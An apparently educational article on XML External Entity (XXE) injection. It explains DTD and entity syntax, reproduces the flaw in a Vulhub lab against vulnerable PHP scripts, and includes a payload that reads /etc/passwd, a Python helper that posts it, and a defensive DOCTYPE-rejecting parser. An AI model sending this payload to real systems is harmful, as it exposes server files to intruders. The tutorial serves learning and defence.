Understanding XXE Vulnerabilities: Risks and Exploitation Techniques in XML Input Parsing

XXE stands for XML External Entity and is shorthand for the XML External Entity Injection attack. The vulnerability occurs when an application parses XML input without disabling external entity loading, so an attacker-supplied document can make the parser load external resources. Depending on the parser and its environment, this can lead to file disclosure, command execution, internal network port scanning, attacks on internal websites, and even DoS. XXE carries significant risk, though it is less common nowadays because many languages and XML libraries disable external entity loading by default. Understanding XXE and its exploitation techniques is still useful from a learning perspective.


Typically, attackers inject a payload into the XML that the application accepts. When the server parses that XML, the payload can read local files on the server or make the server issue requests that probe internal network ports. In other words, XXE lets an attacker reach resources and services from the server’s own position.

Speaking of XML, we must mention DTD. DTD stands for Document Type Definition, which defines the building blocks of a valid XML document: it specifies the set of legal elements and thereby the structure of the document. A DTD can be declared inline within an XML document or referenced as an external file. With a shared DTD, independent applications can exchange and process data with minimal coordination, and an application can also use the DTD to validate that the data it receives conforms to the expected structure.

Internal DTD Declaration:

<!DOCTYPE root-element [element-declarations]>

External DTD Reference:

<!DOCTYPE root-element SYSTEM "filename">

Some important keywords in DTD documents include:

DOCTYPE (Declaration of DTD)

ENTITY (Declaration of Entities)

SYSTEM, PUBLIC (External Resource Requests)

What is an entity? Entities can be understood as variables that must be declared in the DTD and can be referenced elsewhere in the document. Entities are mainly divided into four types:

Built-in Entities, Character Entities, General Entities, and Parameter Entities.

Parameter entities are declared with `% EntityName` (note the space after `%`) and referenced with `%EntityName;`. Other entities are declared with `EntityName` and referenced with `&EntityName;`. Parameter entities can only be declared and referenced within the DTD, while other entities are declared in the DTD and referenced in the XML document.

Internal Entity:

<!ENTITY EntityName "EntityValue">

External Entity:

<!ENTITY EntityName SYSTEM "URI">

Parameter Entity:

<!ENTITY % EntityName "EntityValue"> or <!ENTITY % EntityName SYSTEM "URI">
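The declaration forms above can be told apart programmatically. The following is a minimal sketch in Python (used here for convenience; the article's own examples are PHP) that relies on the standard `xml.parsers.expat` module and its `EntityDeclHandler` callback to list each declared entity as general or parameter and internal or external. The sample document, the entity names, and the URIs are hypothetical, and nothing is fetched because no external entity handler is installed.

```python
import xml.parsers.expat
from urllib.parse import urlparse

# Hypothetical sample: entity names and URIs are illustrative only.
DTD_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY greeting "hello">
  <!ENTITY local SYSTEM "file:///etc/hostname">
  <!ENTITY % remote SYSTEM "http://example.com/ext.dtd">
]>
<r>&greeting;</r>"""


def list_entities(xml_text):
    """Return (name, kind, location, scheme) for every entity declared in the DTD."""
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter" if is_param else "general"
        if system_id is None:
            # Internal entity: the replacement text is given inline in `value`.
            found.append((name, kind, "internal", None))
        else:
            # External entity: only the URI is recorded; it is never dereferenced.
            found.append((name, kind, "external", urlparse(system_id).scheme))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found
```

Calling `list_entities(DTD_SAMPLE)` should report `greeting` as an internal general entity, `local` as an external general entity with the `file` scheme, and `remote` as an external parameter entity with the `http` scheme.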

Non-parameter entities + Internal Entity:

<!DOCTYPE root [<!ENTITY name "EntityValue">]>
<root>&name;</root>
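As a small illustration of the internal-entity case, the Python sketch below (Python's standard `xml.etree.ElementTree` is an assumption made for convenience; the article itself uses PHP) parses a document whose DTD declares a general entity and shows the parser substituting the entity's value where `&name;` appears. The element name `note` and the entity value are made up for the example.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the element name and entity value are illustrative.
DOC = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY name "entity value">
]>
<note>&name;</note>"""


def expand_internal_entity(xml_text):
    """Parse xml_text and return the root element's text after entity expansion."""
    root = ET.fromstring(xml_text)
    return root.text
```

Here `expand_internal_entity(DOC)` returns the declared value rather than the literal text `&name;`, which is the substitution behaviour an external entity abuses when its value comes from a URI instead.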

Parameter Entity + External Entity:

<!DOCTYPE root [<!ENTITY % name SYSTEM "URI"> %name;]>

`%name;` (a parameter entity reference) appears inside the DTD, while `&name;` (any other entity reference) appears in the XML document body. Since the XXE vulnerability mainly exploits external entities in the DTD, let’s focus on the types of external entities that can be referenced.

An external entity points the parser at a resource outside the document instead of holding an inline value. The URI schemes commonly seen in such references include file, http, https, and ftp, and the set that is actually supported differs between languages and parsers. Let’s use the vulnerability environment provided by Vulhub to reproduce the vulnerability. First, let’s look at the code for `SimpleXMLElement.php`:

<?php
$data = file_get_contents('php://input');
$xml = new SimpleXMLElement($data);
echo $xml->name;

The script reads the raw POST body, instantiates a `SimpleXMLElement` from it, and echoes the `name` element, so any entity expanded inside `name` comes back in the response. This is a reflected XXE. The following payload can be sent as-is:



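<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>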
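To make the delivery step concrete, here is a hedged Python sketch of posting such a payload to a local lab instance. The target URL (host, port, and path) is an assumption about how the Vulhub container is exposed locally, the payload is written out in full on the assumption that it matches the one above, and `build_request` and `send` are hypothetical helper names. Only the standard `urllib.request` module is used.

```python
import urllib.request

# Assumption: a local lab container you control; adjust host, port, and path.
TARGET = "http://127.0.0.1:8080/SimpleXMLElement.php"

# Assumed full form of the payload shown above.
PAYLOAD = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>"""


def build_request(url, xml_body):
    """Build a POST request whose raw body is the XML document."""
    return urllib.request.Request(
        url,
        data=xml_body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


def send(request, timeout=5):
    """Send the request and return the response body as text."""
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")
```

With the lab running, `print(send(build_request(TARGET, PAYLOAD)))` would show whatever the script echoes for the `name` element. The PHP script reads `php://input`, so the raw body matters and the content type is informational.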

The `/etc/passwd` file was successfully read. Next, let’s look at the code for `dom.php`:

<?php
$data = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($data);
print_r($dom);

Here, `DOMDocument` is used to parse the XML, but the principle is the same. The same payload works, and only the output format differs slightly. `simplexml_load_string.php` behaves the same way, so screenshots are omitted. Since the payloads above target reflected XXE, I will analyze blind XXE exploitation in another article.
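All of the scripts above hand the request body straight to the parser, so any DTD in it is processed. One common defensive idea is to refuse documents that carry a DOCTYPE at all, since every payload shown here depends on one. The following is a minimal sketch of that idea in Python using the standard `xml.parsers.expat` module; it is an illustration under that assumption, not the fix used by Vulhub or by PHP, and `DoctypeForbidden` and `reject_doctype` are hypothetical names.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def reject_doctype(xml_text):
    """Parse xml_text and raise DoctypeForbidden as soon as a DOCTYPE is seen.

    Malformed XML still raises xml.parsers.expat.ExpatError as usual.
    """

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort before any entity declared in the DTD can be used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)


# Hypothetical inputs for illustration.
BENIGN = "<root><name>alice</name></root>"
XXE_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><name>&xxe;</name></root>"""
```

`reject_doctype(BENIGN)` returns normally, while `reject_doctype(XXE_SAMPLE)` raises `DoctypeForbidden`. The trade-off is that legitimate documents relying on a DTD are rejected as well, which is usually acceptable for request bodies from untrusted clients.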